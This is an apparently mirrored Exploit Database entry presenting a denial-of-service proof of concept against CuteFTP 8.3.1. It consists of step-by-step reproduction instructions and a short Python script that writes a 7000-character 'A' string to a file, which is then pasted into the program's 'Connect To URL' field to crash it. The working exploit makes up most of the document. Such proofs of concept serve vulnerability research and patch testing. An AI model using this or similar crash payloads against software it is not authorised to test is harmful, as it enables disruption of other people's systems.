CuteFTP 8.3.1 – Denial of Service (PoC)

• Exploit Database
• 14 阅读

• 作者： Ali Alipour
  日期： 2018-08-23
• 类别：

  • dos
  平台：

  • windows_x86-64
• 来源：https://www.exploit-db.com/exploits/45246/

• # Exploit Title : CuteFTP 8.3.1 - Denial Of Service (PoC)
  # Exploit Author : Ali Alipour
  # WebSite : Alipour.it
  # Date: 2018-08-22
  # Vendor Homepage : http://www.cuteftp.com/
  # Software Link Download : https://filehippo.com/download_cuteftp_pro/4518/
  # Tested on : Windows 10 - 64-bit
  
  # Steps to Reproduce
  # Run the python exploit script, it will create a new 
  # file with the name "exploit.txt" just copy the text inside "exploit.txt"
  # and start the CuteFTP program. 
  # In the new window click "File" > "Connect" > "Connect To URL" . 
  # Now Paste the content of "exploit.txt" into the field: " Connect To URL ". 
  # Click "OK" and you will see a crash.
  
  #!/usr/bin/python
  
  buffer = "A" * 7000
  payload = buffer
  try:
  f=open("exploit.txt","w")
  print "[+] Creating %s bytes evil payload.." %len(payload)
  f.write(payload)
  f.close()
  print "[+] File created!"
  except:
  print "File cannot be created"